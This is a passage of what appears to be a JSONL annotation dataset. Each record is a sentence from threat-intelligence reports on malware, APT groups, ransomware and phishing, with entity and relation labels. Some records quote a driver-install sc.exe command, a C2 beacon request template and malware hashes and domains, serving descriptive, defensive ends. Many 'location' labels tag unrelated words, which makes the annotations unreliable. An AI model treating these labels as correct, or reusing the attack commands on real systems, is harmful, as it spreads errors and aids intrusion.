data.","entities":[],"relations":[],"Comments":[]} {"id":1837,"text":"We manually replicated the routine and commands for disabling the defense solutions to further look into the routine.","entities":[],"relations":[],"Comments":[]} {"id":14061,"text":"Both use JPG as a delivering extension.","entities":[],"relations":[],"Comments":[]} {"id":7705,"text":" Figure 7. XOR Encrypted C&C communication","entities":[],"relations":[],"Comments":[]} {"id":11269,"text":"Restore endpoint connection Restores the network connectivity on an endpoint after investigation and\/or remediation has occurred","entities":[],"relations":[],"Comments":[]} {"id":148,"text":"The way the attackers get the ransomware on the system varies: it can be through unpatched vulnerabilities, social engineering or both.","entities":[],"relations":[],"Comments":[]} {"id":11185,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":34241,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":34242,"label":"location","start_offset":57,"end_offset":61},{"id":34246,"label":"location","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} {"id":11312,"text":"HYPERSCRAPE demonstrates Charming Kitten\u2019s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":34575,"label":"threat-actor","start_offset":25,"end_offset":40},{"id":34576,"label":"location","start_offset":68,"end_offset":71}],"relations":[],"Comments":[]} {"id":12084,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[],"relations":[],"Comments":[]} {"id":8561,"text":"In early 2021, APT35 compromised a website affiliated with a UK university to host a phishing kit.","entities":[{"id":26452,"label":"threat-actor","start_offset":15,"end_offset":20},{"id":26454,"label":"location","start_offset":64,"end_offset":74},{"id":26455,"label":"location","start_offset":78,"end_offset":82},{"id":26456,"label":"attack-pattern","start_offset":85,"end_offset":93}],"relations":[],"Comments":[]} {"id":9610,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} {"id":4969,"text":"Consistent with findings from CitizenLab, we assess likely government-backed actors purchasing these exploits are operating (at least) in Egypt, Armenia, Greece, Madagascar, C\u00f4te d\u2019Ivoire, Serbia, Spain and Indonesia.","entities":[{"id":51025,"label":"location","start_offset":162,"end_offset":173},{"id":51026,"label":"location","start_offset":174,"end_offset":187},{"id":51027,"label":"location","start_offset":189,"end_offset":195},{"id":51029,"label":"location","start_offset":207,"end_offset":216},{"id":51021,"label":"identity","start_offset":30,"end_offset":40},{"id":51023,"label":"location","start_offset":145,"end_offset":152},{"id":51028,"label":"location","start_offset":197,"end_offset":202},{"id":51024,"label":"location","start_offset":154,"end_offset":160},{"id":51022,"label":"location","start_offset":138,"end_offset":143}],"relations":[],"Comments":[]} {"id":5776,"text":"Jon Clay, VP of Threat Intelligence: [00:00:00","entities":[],"relations":[],"Comments":[]} {"id":7445,"text":"Here is an example from 2015 where \u201cMcAfee Email Protection\u201d is offered.","entities":[{"id":23149,"label":"identity","start_offset":36,"end_offset":42},{"id":23150,"label":"location","start_offset":49,"end_offset":59}],"relations":[],"Comments":[]} {"id":5154,"text":"Once they've driven to the store.","entities":[],"relations":[],"Comments":[]} {"id":1763,"text":"Further details were discussed in depth last month on Rapid7\u2019s blog.","entities":[{"id":46913,"label":"identity","start_offset":53,"end_offset":60}],"relations":[],"Comments":[]} {"id":5313,"text":"The function that initializes the modules In Figure 1, we inferred the following mod_t structure: Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":3270,"text":"After the malware joins the C&C server, the server will assign a victim ID with \u201cset key\u201d event and send multiple \u201caccept task\u201d events with the commands \u201cScreenShot\u201d, \u201cSnsInfo\u201d, \u201cPackingTelegram\u201d, \u201cGetBrowsersCookies\u201d, \u201cGetBrowsersLogins\u201d, \u201cGetBrowsersHistories\u201d, and \u201cGetBrowsersBookmarks\u201d to instruct the malware to collect private data from the victim.","entities":[],"relations":[],"Comments":[]} {"id":1105,"text":"Simply put: malware writers leverage malware specific libraries and groups of like actors will reuse these core libraries when able. The needle in a haystack problem forever plagues malware research: it\u2019s extremely difficult to find reliable information with malware writers constantly working to undermine or eliminate that information.","entities":[],"relations":[],"Comments":[]} {"id":13643,"text":"The phishing emails redirect users to fake Office 365 login pages.","entities":[{"id":42476,"label":"attack-pattern","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} {"id":1015,"text":"He claimed that once the account was sold, only the one buyer and the legitimate user would have access.","entities":[],"relations":[],"Comments":[]} {"id":10402,"text":"Send the volume serial number of the C drive, which allows the attacker to identify the victim.","entities":[],"relations":[],"Comments":[]} {"id":11364,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} {"id":612,"text":" Figure 3: Hancitor distribution servers globally thus far in 2017 Table 1 \u2013 Number of Distribution Servers by Country ","entities":[{"id":44799,"label":"malware","start_offset":11,"end_offset":19},{"id":44800,"label":"TIME","start_offset":62,"end_offset":66}],"relations":[],"Comments":[]} {"id":3725,"text":"ATT&CK\u00ae tactics and techniques for Linux were also shared by MITRE.","entities":[{"id":49525,"label":"identity","start_offset":61,"end_offset":66},{"id":49526,"label":"SOFTWARE","start_offset":35,"end_offset":40}],"relations":[],"Comments":[]} {"id":433,"text":" Where this becomes a problem is when coin mining is done without the user\u2019s knowledge and consent.","entities":[],"relations":[],"Comments":[]} {"id":5819,"text":"Jon:","entities":[],"relations":[],"Comments":[]} {"id":751,"text":"The heap block will not be occupied by user-controlled data after the critical objects are freed.","entities":[],"relations":[],"Comments":[]} {"id":7435,"text":" Figure 2. A phony email from Pawn Storm","entities":[{"id":23121,"label":"threat-actor","start_offset":40,"end_offset":50}],"relations":[],"Comments":[]} {"id":278,"text":" There is no single action you can take to protect your organization against this threat.","entities":[],"relations":[],"Comments":[]} {"id":3871,"text":"Given how cybercriminal tools, tactics and procedures are evolving, organizations will have to go beyond their typical day-to-day security requirements and find a way to preempt attacks.","entities":[],"relations":[],"Comments":[]} {"id":3560,"text":"The infection chain for Capesand that also shows the obfuscation mechanisms For this particular sample, CyaX_Sharp is obfuscated with a customized version of ConfuserEx.","entities":[{"id":49348,"label":"tools","start_offset":104,"end_offset":114},{"id":49349,"label":"tools","start_offset":158,"end_offset":168},{"id":49347,"label":"malware","start_offset":24,"end_offset":32}],"relations":[],"Comments":[]} {"id":7143,"text":"Weaponized documents exploiting the Dynamic Data Exchange (DDE) method Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor Exploitation of the CVE-2019-0604 vulnerability in Sharepoint Supply chain attack that compromises a chat software installer, Able Desktop Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server","entities":[{"id":22321,"label":"attack-pattern","start_offset":36,"end_offset":57},{"id":22322,"label":"threat-actor","start_offset":138,"end_offset":146},{"id":22323,"label":"location","start_offset":216,"end_offset":222},{"id":22324,"label":"location","start_offset":255,"end_offset":259},{"id":22325,"label":"location","start_offset":342,"end_offset":347},{"id":22326,"label":"location","start_offset":381,"end_offset":384},{"id":22327,"label":"identity","start_offset":404,"end_offset":413},{"id":22328,"label":"location","start_offset":414,"end_offset":422}],"relations":[],"Comments":[]} {"id":4767,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50672,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":4784,"text":" We believe it is time for government, industry and civil society to come together to change the incentive structure which has allowed these technologies to spread in secret.","entities":[],"relations":[],"Comments":[]} {"id":1732,"text":"They can also steal your computer\u2019s processing power to mine for cryptocurrencies, which slows down your system.","entities":[],"relations":[],"Comments":[]} {"id":9313,"text":"Impersonating the Google Analytics service is a known tactic also used by Magecart Group 11, the group behind the Vision Direct breach.","entities":[],"relations":[],"Comments":[]} {"id":4045,"text":"Based on our current cases, the decrypted payload is Quasar RAT.","entities":[{"id":12265,"label":"malware","start_offset":53,"end_offset":63}],"relations":[],"Comments":[]} {"id":9621,"text":"We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. APT 32, APT-C-00, SeaLotus, and Cobalt Kitty).","entities":[{"id":29476,"label":"malware","start_offset":60,"end_offset":76},{"id":29478,"label":"threat-actor","start_offset":155,"end_offset":161},{"id":29481,"label":"location","start_offset":183,"end_offset":186}],"relations":[],"Comments":[]} {"id":14027,"text":"Some Freenki samples had leaked the OS language ID through this same mechanism.","entities":[{"id":47193,"label":"malware","start_offset":5,"end_offset":13}],"relations":[],"Comments":[]} {"id":1423,"text":"Following a recent study of apps in the Google Play Store, let\u2019s discuss several security risks caused by the bad certificate management practiced in many Android apps, from social to mobile banking.","entities":[{"id":46760,"label":"SOFTWARE","start_offset":40,"end_offset":57},{"id":46761,"label":"SOFTWARE","start_offset":155,"end_offset":162}],"relations":[],"Comments":[]} {"id":5779,"text":"Joining me again is my cohort in crime.","entities":[],"relations":[],"Comments":[]} {"id":3589,"text":"The leaked debug symbols paths","entities":[],"relations":[],"Comments":[]} {"id":10858,"text":"phkyxc: A component used as WifiWakeLock.","entities":[],"relations":[],"Comments":[]} {"id":13846,"text":"T1129 Dynamically loads the DLLs through the shellcode Execution through API T1106","entities":[{"id":42922,"label":"attack-pattern","start_offset":57,"end_offset":78}],"relations":[],"Comments":[]} {"id":4563,"text":"Indicators: The Follina vulnerability (CVE-2022-30190), first disclosed in late May, received significant usage from both APT and cybercrime groups throughout June after it was patched by Microsoft.","entities":[{"id":50382,"label":"vulnerability","start_offset":16,"end_offset":54},{"id":50383,"label":"TIME","start_offset":75,"end_offset":83},{"id":50384,"label":"TIME","start_offset":159,"end_offset":163},{"id":50385,"label":"identity","start_offset":188,"end_offset":197}],"relations":[],"Comments":[]} {"id":5087,"text":"This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors.","entities":[],"relations":[],"Comments":[]} {"id":6720,"text":"We terminated 3 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} {"id":534,"text":"For example, GandCrab uses JScript as a downloader, leveraging Windows Background Intelligent Transfer Service (BITS) to download the payload in the background (Figure 5).","entities":[{"id":44765,"label":"malware","start_offset":13,"end_offset":21},{"id":44766,"label":"tools","start_offset":63,"end_offset":117}],"relations":[{"id":20,"from_id":44765,"to_id":44766,"type":"uses"}],"Comments":[]} {"id":7589,"text":"In this case, repotaj.dll, which is ServHelper, will be extracted to %TEMP% and execute with the \u201cfeast\u201d parameter as its export function.","entities":[{"id":23652,"label":"location","start_offset":8,"end_offset":12},{"id":23653,"label":"malware","start_offset":36,"end_offset":46},{"id":23654,"label":"location","start_offset":48,"end_offset":52},{"id":23655,"label":"location","start_offset":76,"end_offset":79},{"id":23656,"label":"location","start_offset":122,"end_offset":128}],"relations":[],"Comments":[]} {"id":4479,"text":"TAG also recently released information on a segment of attackers we call \u201chack-for-hire\u201d that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50279,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50278,"label":"identity","start_offset":0,"end_offset":3},{"id":50280,"label":"attack-pattern","start_offset":74,"end_offset":87}],"relations":[],"Comments":[]} {"id":10185,"text":"Cookie Theft, also known as \u201cpass-the-cookie attack,\u201d is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":31104,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} {"id":9322,"text":"ReactGet Group injection pattern Figure 7.","entities":[],"relations":[],"Comments":[]} {"id":3661,"text":"MITRE also identifies different main targets for each group: While Carbanak focuses on banking institutions, FIN7 targets food, hospitality, and retail establishments.","entities":[{"id":49437,"label":"threat-actor","start_offset":67,"end_offset":75},{"id":49438,"label":"threat-actor","start_offset":109,"end_offset":113},{"id":49436,"label":"identity","start_offset":0,"end_offset":5},{"id":49439,"label":"identity","start_offset":87,"end_offset":107},{"id":49440,"label":"identity","start_offset":122,"end_offset":166}],"relations":[{"id":795,"from_id":49437,"to_id":49439,"type":"targets"},{"id":796,"from_id":49438,"to_id":49440,"type":"targets"}],"Comments":[]} {"id":14382,"text":"EDR is great for endpoints they are on.","entities":[],"relations":[],"Comments":[]} {"id":2970,"text":"PCs and Macs as well as smartphones and tablets increasingly support the use of password managers directly.","entities":[],"relations":[],"Comments":[]} {"id":1635,"text":"One account using the name \u201cOscar Sanchez\u201d gave high ratings and positive comments to many of the \u201cfun app\u201d applications.","entities":[{"id":45081,"label":"identity","start_offset":28,"end_offset":41},{"id":46858,"label":"identity","start_offset":99,"end_offset":106}],"relations":[],"Comments":[]} {"id":3504,"text":"Marade acts as the first stage of attack, sending the compromised system\u2019s information to the C&C server and then awaiting commands from the controller.","entities":[{"id":49299,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":416,"text":" What Is Unauthorized Coin Mining?","entities":[{"id":46114,"label":"attack-pattern","start_offset":9,"end_offset":33}],"relations":[],"Comments":[]} {"id":3991,"text":" While the guideline gives thorough recommendations on preventing supply chain attacks, it is still vital for organizations to take extra measures to mitigate vulnerable software components.","entities":[],"relations":[],"Comments":[]} {"id":5699,"text":"Our telemetry data shows Earth Lusca sending spear phishing emails containing malicious links to one of their targets \u2014 a media company.","entities":[{"id":17581,"label":"attack-pattern","start_offset":45,"end_offset":59},{"id":17583,"label":"location","start_offset":122,"end_offset":127}],"relations":[],"Comments":[]} {"id":6454,"text":"This feature allows an intermediary Internet server to broker the connection, similar to a proxy server.","entities":[],"relations":[],"Comments":[]} {"id":3535,"text":"And once infection with a backdoor occurs, typical red flags may not be raised as it abuses microblogging and social media services to retrieve information needed for C&C communication.","entities":[],"relations":[],"Comments":[]} {"id":3605,"text":"Note that the KurdishCoder indicator was spotted also by the Italian Computer Emergency Response Team - Pubblica Amministrazione (CERT-PA), which they reported as a single incident.","entities":[{"id":49385,"label":"identity","start_offset":61,"end_offset":138}],"relations":[],"Comments":[]} {"id":603,"text":"When they would do this, the Hancitor attachment would download and install the final malware from a malicious or compromised site.","entities":[{"id":44793,"label":"malware","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} {"id":2655,"text":"The operators work with initial access brokers to save time and allow for a larger profit potential.","entities":[],"relations":[],"Comments":[]} {"id":10615,"text":"We encourage high-risk users\u2014like journalists, human rights activists, and political campaigns\u2014to enroll in our Advanced Protection Program (APP), which utilizes hardware security keys and provides the strongest protections available against phishing and account hijackings.","entities":[{"id":32379,"label":"location","start_offset":71,"end_offset":74},{"id":32380,"label":"location","start_offset":121,"end_offset":131},{"id":32381,"label":"location","start_offset":171,"end_offset":179},{"id":32382,"label":"location","start_offset":185,"end_offset":188},{"id":32383,"label":"attack-pattern","start_offset":242,"end_offset":250},{"id":32384,"label":"location","start_offset":251,"end_offset":254}],"relations":[],"Comments":[]} {"id":13399,"text":"ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC.","entities":[{"id":41708,"label":"malware","start_offset":0,"end_offset":5},{"id":41709,"label":"location","start_offset":49,"end_offset":52}],"relations":[],"Comments":[]} {"id":8117,"text":"MediaTek-SU exploit","entities":[],"relations":[],"Comments":[]} {"id":3173,"text":"What makes BIOPASS RAT particularly interesting is that it can sniff its victim\u2019s screen by abusing the framework of Open Broadcaster Software (OBS) Studio, a popular live streaming and video recording app, to establish live streaming to a cloud service via Real-Time Messaging Protocol (RTMP).","entities":[{"id":48296,"label":"malware","start_offset":11,"end_offset":22},{"id":48298,"label":"SOFTWARE","start_offset":258,"end_offset":293},{"id":48297,"label":"SOFTWARE","start_offset":117,"end_offset":148}],"relations":[{"id":400,"from_id":48296,"to_id":48297,"type":"targets"}],"Comments":[]} {"id":3860,"text":"Short-term mitigation","entities":[],"relations":[],"Comments":[]} {"id":7249,"text":"In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors\u2019 blog.","entities":[],"relations":[],"Comments":[]} {"id":13540,"text":"However, since early 2020, we\u2019ve noticed some changes to Water Pamola\u2019s activity.","entities":[{"id":51609,"label":"campaign","start_offset":57,"end_offset":69},{"id":51610,"label":"TIME","start_offset":15,"end_offset":25}],"relations":[],"Comments":[]} {"id":14121,"text":"Compile Time APT73 and Kitsune","entities":[{"id":48185,"label":"threat-actor","start_offset":13,"end_offset":18},{"id":48186,"label":"campaign","start_offset":23,"end_offset":30}],"relations":[],"Comments":[]} {"id":8128,"text":"Meanwhile, the app invokes code from the extra DEX file to enable the installation of unknown apps and the installation of the payload app callCam.","entities":[{"id":25169,"label":"location","start_offset":99,"end_offset":102},{"id":25170,"label":"malware","start_offset":139,"end_offset":146}],"relations":[],"Comments":[]} {"id":7539,"text":"Countermeasures and Trend Micro Solutions Users unfamiliar with the various kinds of social engineering techniques might find it difficult to distinguish a legitimate message from a malicious one \u2013 thus the need for education on identifying and mitigating phishing attacks \u2013 especially if it involves organizations in sensitive industries such as government and manufacturing.","entities":[{"id":23419,"label":"location","start_offset":16,"end_offset":19},{"id":23420,"label":"location","start_offset":26,"end_offset":31},{"id":23421,"label":"location","start_offset":192,"end_offset":195},{"id":23422,"label":"location","start_offset":241,"end_offset":244},{"id":23423,"label":"attack-pattern","start_offset":256,"end_offset":264},{"id":23424,"label":"location","start_offset":358,"end_offset":361}],"relations":[],"Comments":[]} {"id":8794,"text":"We haven\u2019t seen any evidence of such attempts being successful.","entities":[],"relations":[],"Comments":[]} {"id":1904,"text":"Some of these features are listed below.","entities":[],"relations":[],"Comments":[]} {"id":2183,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":826,"text":" We also recommend users of the Chrome browser to update to version 79.0.3945.130 as they recently released an update to fix the TLS issue. Palo Alto Networks customers running Traps are now safeguarded from the Windows CryptoAPI Spoofing vulnerability, regardless of whether they are running an unpatched Microsoft Windows 10 system.","entities":[{"id":46376,"label":"SOFTWARE","start_offset":307,"end_offset":328},{"id":46375,"label":"SOFTWARE","start_offset":213,"end_offset":230},{"id":46373,"label":"SOFTWARE","start_offset":32,"end_offset":38},{"id":46374,"label":"identity","start_offset":141,"end_offset":159}],"relations":[],"Comments":[]} {"id":4199,"text":"Remote Services: SMB\/Windows Admin Shares Discovery T1087.002","entities":[{"id":50005,"label":"attack-pattern","start_offset":17,"end_offset":61}],"relations":[],"Comments":[]} {"id":12776,"text":"PLEAD\u2019s installers are disguised as documents using the right-to-left-override (RTLO) technique to obfuscate the malware\u2019s filename.","entities":[{"id":39755,"label":"tools","start_offset":0,"end_offset":5},{"id":39756,"label":"location","start_offset":19,"end_offset":22}],"relations":[],"Comments":[]} {"id":12058,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[{"id":37314,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":37315,"label":"location","start_offset":17,"end_offset":21}],"relations":[],"Comments":[]} {"id":1569,"text":" Bad Rabbit is a ransomware attack that, at the time of this writing, appears to primarily be affecting countries in Eastern Europe.","entities":[{"id":45059,"label":"malware","start_offset":1,"end_offset":11},{"id":45060,"label":"location","start_offset":117,"end_offset":131}],"relations":[{"id":75,"from_id":45059,"to_id":45060,"type":"targets"}],"Comments":[]} {"id":13639,"text":" Tags Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports | Cyber Threats","entities":[],"relations":[],"Comments":[]} {"id":13499,"text":"While it offers standard mailbox copies that was likely stolen with the help of credential phishing, Void Balaur also offers copies of mailboxes that have not been interacted with \u2014 for a higher price.","entities":[{"id":51567,"label":"threat-actor","start_offset":101,"end_offset":112},{"id":51568,"label":"attack-pattern","start_offset":80,"end_offset":99}],"relations":[{"id":1104,"from_id":51567,"to_id":51568,"type":"uses"}],"Comments":[]} {"id":4168,"text":" Figure 13. Network configuration (Left: ChiserClient","entities":[{"id":12518,"label":"malware","start_offset":45,"end_offset":57}],"relations":[],"Comments":[]} {"id":3384,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3195c355aa564ea66b4b37baa9547cb53dde7cf4ae7010256db92fff0bde873d flash.exe","entities":[{"id":10232,"label":"malware","start_offset":0,"end_offset":11},{"id":10233,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49035,"label":"malware","start_offset":20,"end_offset":44},{"id":49036,"label":"FILEPATH","start_offset":112,"end_offset":121}],"relations":[{"id":582,"from_id":10232,"to_id":49035,"type":"duplicate-of"},{"id":583,"from_id":49036,"to_id":10233,"type":"duplicate-of"},{"id":584,"from_id":49036,"to_id":49035,"type":"indicates"},{"id":585,"from_id":10233,"to_id":49035,"type":"indicates"}],"Comments":[]} {"id":10739,"text":"SteganographyDaserf\u2019s infection chain accordingly evolved, as shown below.","entities":[],"relations":[],"Comments":[]} {"id":4770,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50674,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} {"id":11053,"text":"We received leads from the FBI that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} {"id":13627,"text":"Figure 16.","entities":[],"relations":[],"Comments":[]} {"id":4578,"text":"In just two days, the volume observed and categorized as spam by Gmail exceeded 4,500 emails.","entities":[{"id":50429,"label":"SOFTWARE","start_offset":65,"end_offset":70}],"relations":[],"Comments":[]} {"id":8361,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} {"id":4976,"text":"Once clicked, the link redirected the target to an attacker-owned domain that delivered the exploits before redirecting the browser to a legitimate website.","entities":[],"relations":[],"Comments":[]} {"id":7180,"text":"On June 21, we found that the website of a Korean non-profit organization was compromised with an injected script that collected visitors\u2019 information.","entities":[],"relations":[],"Comments":[]} {"id":3186,"text":"This step is likely designed to avoid attacking an already infected victim.","entities":[],"relations":[],"Comments":[]} {"id":493,"text":" Figure 1: Bogus patch installer overlying malware requesting administrative permissions This interaction can install malware or malicious software on the device, grant malware full administrative privileges or lock the user out and render the device unusable. In the past successful overlay attacks were typically dependent on two conditions: However, with this particular vulnerability, these conditions are no longer required for a successful attack.","entities":[],"relations":[],"Comments":[]} {"id":1823,"text":"We found an Avast anti-rootkit driver installed as service 'asWarPot.sys' using the command sc.exe create aswSP_ArPot2 binPath= C:\\windows\\aswArPot.sys type= kernel.","entities":[{"id":46957,"label":"FILEPATH","start_offset":60,"end_offset":72},{"id":46958,"label":"FILEPATH","start_offset":92,"end_offset":98},{"id":46959,"label":"FILEPATH","start_offset":129,"end_offset":152},{"id":46960,"label":"SOFTWARE","start_offset":12,"end_offset":37}],"relations":[{"id":279,"from_id":46960,"to_id":46957,"type":"consists-of"}],"Comments":[]} {"id":8824,"text":"While it\u2019s less common to see DDoS attacks rather than phishing or hacking campaigns coming from government-backed threat groups, we\u2019ve seen bigger players increase their capabilities in launching large-scale attacks in recent years.","entities":[{"id":27333,"label":"attack-pattern","start_offset":55,"end_offset":63},{"id":27334,"label":"location","start_offset":197,"end_offset":202}],"relations":[],"Comments":[]} {"id":689,"text":"RTF files will look exactly like regular Word documents ","entities":[{"id":46268,"label":"SOFTWARE","start_offset":41,"end_offset":45}],"relations":[],"Comments":[]} {"id":3232,"text":"This file is a marker to determine if the scheduled task of the backdoor has been installed.","entities":[],"relations":[],"Comments":[]} {"id":7986,"text":"Cookie Theft, also known as \u201cpass-the-cookie attack,\u201d is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":24762,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} {"id":12667,"text":"Activate sandbox analysis.","entities":[],"relations":[],"Comments":[]} {"id":4955,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":50980,"label":"threat-actor","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} {"id":4237,"text":"Microsoft Powerpoint presentation .png, .jpg, .jpeg Image file .pst, .ost Microsoft Outlook file .csv","entities":[],"relations":[],"Comments":[]} {"id":1443,"text":"The only way to update an app is for the developer to sign the update with the same digital certificate originally used to publish the app.","entities":[{"id":47145,"label":"identity","start_offset":41,"end_offset":51}],"relations":[],"Comments":[]} {"id":3699,"text":"The group also evades virtualization and sandboxes and injects malicious code into hollowed processes to dodge process-based defenses.","entities":[{"id":49498,"label":"attack-pattern","start_offset":15,"end_offset":50},{"id":49499,"label":"attack-pattern","start_offset":56,"end_offset":77}],"relations":[],"Comments":[]} {"id":1,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) CTB-Locker is a well-known ransomware Trojan used by crimeware groups to encrypt files on the victim's endpoints and demand ransom payment to decrypt the files back to their original state, but most antiviruses detect it by mistake as CryptoLocker (only one vendor correctly detects it as CTB-Locker).","entities":[{"id":45800,"label":"malware","start_offset":288,"end_offset":300},{"id":45801,"label":"malware","start_offset":53,"end_offset":63},{"id":45802,"label":"malware","start_offset":342,"end_offset":352}],"relations":[],"Comments":[]} {"id":1906,"text":" File type File extensions Document files .txt, .csv, .doc, .docx, .xls, .xlsx, .pdf WhatsApp databases .db.crypt5 to .db.crypt12 Geolocation related files .kml, .kmz, .gmx, .aqm Audio files .mp3, .opus Videos .mp4, .amr, .wmv, .3gp, Pictures .jpeg, .jpg ","entities":[{"id":47031,"label":"SOFTWARE","start_offset":86,"end_offset":94}],"relations":[],"Comments":[]} {"id":7144,"text":"During our investigation, we found some old samples that fit in these categories but have not been reported.","entities":[],"relations":[],"Comments":[]} {"id":10099,"text":"According to the SolarWinds SEC filing, this trojanized version was downloaded by under 18,000 customers from March to June of 2020.","entities":[],"relations":[],"Comments":[]} {"id":1068,"text":"In particular, this means that malicious apps from websites and app stores other than Google Play can carry out overlay attacks.","entities":[{"id":46552,"label":"SOFTWARE","start_offset":86,"end_offset":98}],"relations":[],"Comments":[]} {"id":2685,"text":" There was a bug that existed in LockBit 2.0 that allowed researchers to revert the encryption process on an MSSQL database.","entities":[{"id":47894,"label":"SOFTWARE","start_offset":109,"end_offset":114},{"id":45657,"label":"threat-actor","start_offset":32,"end_offset":44}],"relations":[],"Comments":[]} {"id":6435,"text":"The phishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute archives containing the ScreenConnect remote administrator tool.","entities":[{"id":20029,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":20030,"label":"location","start_offset":20,"end_offset":23},{"id":20031,"label":"location","start_offset":24,"end_offset":28},{"id":20033,"label":"location","start_offset":158,"end_offset":164},{"id":20034,"label":"location","start_offset":179,"end_offset":183}],"relations":[],"Comments":[]} {"id":6013,"text":"In mid-March, a security researcher released a blog post detailing a 'Browser in the Browser' phishing technique.","entities":[{"id":18557,"label":"location","start_offset":16,"end_offset":24},{"id":18558,"label":"location","start_offset":52,"end_offset":56},{"id":18559,"label":"attack-pattern","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} {"id":13116,"text":"Marketplaces like the one offered by AWS make it a lot easier to get the right security tools in the hands of those that need them most.","entities":[{"id":48901,"label":"SOFTWARE","start_offset":37,"end_offset":41}],"relations":[],"Comments":[]} {"id":13728,"text":"The evidence is that Waterbear frequently uses internal IPs as its own C&C servers (for instance, b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361 uses an internal IP address of 10[.]0[.]0[.]211 as its C&C server).","entities":[{"id":42688,"label":"SHA2","start_offset":98,"end_offset":162},{"id":42689,"label":"IPV4","start_offset":194,"end_offset":210}],"relations":[],"Comments":[]} {"id":11516,"text":"They also conduct corporate espionage, handily obscuring their clients\u2019 role.","entities":[],"relations":[],"Comments":[]} {"id":9476,"text":"RemoteModuleCommandPacket","entities":[],"relations":[],"Comments":[]} {"id":13628,"text":"XOR routine that encrypts C&C communication Figure 17.","entities":[],"relations":[],"Comments":[]} {"id":3473,"text":"The C&C server will send Protux to the victim\u2019s host and execute it.","entities":[{"id":49272,"label":"malware","start_offset":25,"end_offset":31}],"relations":[],"Comments":[]} {"id":14115,"text":"It is fair to assume that the developers work on daily working times.","entities":[],"relations":[],"Comments":[]} {"id":3348,"text":"The Cobalt Strike loader, which has a PDB string \u201cC:\\Users\\test\\Desktop\\fishmaster\\x64\\Release\\fishmaster.pdb\u201d, connects to the C&C server \u201cdownload[.]google-images[.]ml\u201d.","entities":[{"id":48959,"label":"tools","start_offset":4,"end_offset":17},{"id":48960,"label":"FILEPATH","start_offset":50,"end_offset":109},{"id":48961,"label":"DOMAIN","start_offset":140,"end_offset":169}],"relations":[{"id":511,"from_id":48960,"to_id":48959,"type":"indicates"},{"id":514,"from_id":48959,"to_id":48961,"type":"beacons-to"}],"Comments":[]} {"id":4043,"text":"The command for execution is shown as here: > Nerapack.exe {base64 encoded key}","entities":[{"id":49894,"label":"FILEPATH","start_offset":46,"end_offset":58}],"relations":[],"Comments":[]} {"id":2901,"text":"= this.m_rawLen;","entities":[],"relations":[],"Comments":[]} {"id":2815,"text":"WanaCrypt0r v 1.0 was first reported a few months ago but did not include the worm capability associated with this attack.","entities":[{"id":48032,"label":"malware","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} {"id":3145,"text":"AWS starts with the customer and works backwards.","entities":[{"id":48267,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":11332,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":34614,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} {"id":13612,"text":"After extracting the content of the Adob.dll zip archive, two legitimate and signed executable files are present and executed, and a similar sideloading process happens once more.","entities":[{"id":51701,"label":"FILEPATH","start_offset":36,"end_offset":45}],"relations":[],"Comments":[]} {"id":7697,"text":"Encrypted string We observed that some of the samples still had errors in the cipher routine.","entities":[],"relations":[],"Comments":[]} {"id":2911,"text":"The many similarities between these 